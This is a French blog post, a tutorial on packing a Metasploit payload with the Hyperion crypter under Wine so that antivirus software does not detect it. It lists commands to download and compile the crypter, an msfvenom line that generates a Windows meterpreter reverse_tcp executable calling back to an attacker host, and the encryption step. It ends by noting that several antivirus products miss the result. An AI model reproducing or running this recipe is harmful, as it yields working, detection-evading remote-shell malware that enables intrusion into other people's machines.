mercredi 2 octobre 2013

Encoder un payload Metasploit avec Hyperion



Hyperion est un Crypter PE (Portable Executable)

Nous allons ici l'utiliser sous Backtrack 5 R3 avec l'aide de wine pour encoder notre payload Metasploit et ainsi tenter de contourner la protection de certains AVs (cette méhode donne de bons résultats d'ailleurs)

Commencez par télécharger l'archive

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip

A l'heure où j'écris, le site est down, mais vous pouvez récupérer l'archive ici: 
http://packetstormsecurity.org/files/download/113060/Hyperion-1.0.zip

unzip Hyperion-1.0.zip

cd Hyperion-1.0


Et on le compile de cette façon:


wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe




Créons maintenant notre payload metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.X.X LPORT=443 -f exe >payload.exe


Et on encode notre payload de la facon suivante:

wine crypter.exe payload.exe encrypted_payload.exe



On teste notre exécutable sur NoVirusThanks 


C'est pas parfait mais on peut voir que quelques incontournables du marché sont dans les choux (Avast, Bitdefender...)

0 commentaires:

Enregistrer un commentaire